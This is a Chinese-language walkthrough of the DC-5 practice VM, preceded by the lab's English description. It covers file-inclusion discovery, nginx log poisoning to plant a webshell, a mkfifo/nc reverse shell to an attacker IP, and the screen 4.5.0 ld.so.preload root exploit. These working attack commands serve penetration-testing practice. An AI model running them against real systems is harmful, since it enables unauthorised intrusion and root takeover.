靶机信息
DESCRIPTION
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
But if you're really, really stuck, you can watch this video which shows the first step.
TECHNICAL INFORMATION
DC-5 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7信息收集
部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口
#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.21
根据扫描结果,访问80端口
根据作者提示,每刷新都会有不同的显示,如果是动态包含,就存在文件包含漏洞
flag1
可以尝试爆破网站路径来获得信息,可以使用dirb,wfuzz,或者burpsuite,不论哪种工具都会依赖可靠的字典
爆破以后会发现
footer.php的文件,说明存在文件包含,继续爆破验证是否为动态文件包含
因为是
thankyou.php可能存在动态文件包含,尝试在该页面进行参数名的爆破
- 正如
footer.php一样,如果成功包含index.php,体现出来的页面就会不同
爆破以后会发现
file的参数,可以利用nginx的日志尝试注入木马
注入后日志就会存在nginx的日志中
nginx日志默认路径是
/var/log/nginx/access.log
使用菜刀连接,经历过爆破的nginx日志会很大,所以可以尝试在服务器中再注入一个小马
在服务器中使用nc反弹shell到本地获得持久shell
#nc
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.221 1234 >/tmp/f
#进入交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'使用find查找用户的特权命令
find / -perm -u=s -type f 2>/dev/null根据该命令找到提权漏洞
searchsploit screen 4.5.0
获得脚本后使用蚁剑上传到靶机
发现脚本无法直接执行,打开脚本后发现是创建c文件并编译,可以在kali中编译后放入靶机执行
手动执行其中的代码,并编译文件,上传到靶机
然后执行以下内容
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
查看flag
Alipay
Wechat
最后一次更新于2021-03-03 10:25
0 条评论